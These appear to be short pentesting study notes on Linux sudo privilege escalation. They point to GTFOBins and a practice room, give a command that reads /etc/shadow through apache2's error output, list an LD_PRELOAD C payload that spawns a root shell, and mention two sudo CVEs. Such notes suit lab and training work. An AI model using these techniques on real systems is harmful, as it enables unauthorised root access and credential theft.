# Sudo

## SUDO SHELL ESCAPING:

Use GTFO bins: <https://gtfobins.github.io/>

Practice: <https://tryhackme.com/room/privescplayground>

## INTENDED FUNCTIONALITY:

When you can't find an exploit on GTFO bins but you can abuse some functionality of the program running. Suppose the program is apache2 then search: **sudo apache2 privilege escalation**

Some of the exploits wont let you get a shell but they can help you view system files. It errors out the line which it doesn't understand.&#x20;

Ex: apache2, wget

**sudo apache2 -f /etc/shadow**

## LD\_PRELOAD:

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
    
```

## CVE-2019-14287: sudo 1.8.27

If we get **(All, !root) /bin/bash**

## CVE-2019-18634:&#x20;

Find sudo version using: sudo -V

If the version is 1.8.21p2 and password feedback is enabled